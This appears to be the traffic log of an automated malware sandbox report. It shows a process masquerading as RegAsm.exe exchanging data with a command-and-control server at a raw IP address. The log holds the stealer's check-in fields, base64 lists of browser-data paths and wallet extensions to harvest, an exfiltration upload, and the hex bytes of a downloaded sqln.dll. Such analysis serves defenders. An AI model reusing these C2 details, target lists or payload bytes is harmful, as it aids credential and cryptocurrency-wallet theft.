                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:15 GMT
                                                                                                                                                                                                          Content-Length: 34667
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: sessionid=30ba0b649cebdb544c908c56; Path=/; Secure; SameSite=None
                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C6a48c77af2572e5bf5294ad967f9240e; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                          2024-04-10 06:56:15 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                          2024-04-10 06:56:16 UTC10074INData Raw: 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72
                                                                                                                                                                                                          Data Ascii: ent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header
                                                                                                                                                                                                          2024-04-10 06:56:16 UTC10091INData Raw: 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75
                                                                                                                                                                                                          Data Ascii: ;https:\/\/store.cloudflare.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot;https:\/\/steamcommunity.com\/&quot;,&quot;CHAT_BASE_URL&qu


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          8192.168.2.44974395.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:16 UTC234OUTGET / HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:17 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          9192.168.2.44974495.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:17 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 279
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:17 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 30 42 43 38 34 44 32 43 46 45 31 30 33 30 33 36 31 34 34 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                          Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="hwid"530BC84D2CFE1030361446-a33c7340-61ca-11ee-8c18-806e6f6e6963------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------
                                                                                                                                                                                                          2024-04-10 06:56:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:18 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:18 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 3a1|1|1|0|a2aabab03a5b20995a03e3e03780ebd6|1|1|1|0|0|50000|00


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          10192.168.2.44974595.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:20 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHD
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------JEBKECAFIDAFIECBKEHDCont
                                                                                                                                                                                                          2024-04-10 06:56:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:21 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:21 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          11192.168.2.44974695.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:21 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:21 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------ECGIIIDAKJDHJKFHIEBFCont
                                                                                                                                                                                                          2024-04-10 06:56:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:22 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:22 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                          Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          12192.168.2.44975095.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:22 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 7105
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:22 UTC7105OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------DHCAECGIEBKJKEBGDHDACont
                                                                                                                                                                                                          2024-04-10 06:56:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:23 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          13192.168.2.44975395.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:23 UTC242OUTGET /sqln.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:24 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                          Last-Modified: Mon, 01 Apr 2024 09:22:32 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "660a7cd8-258600"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                          Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                          Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
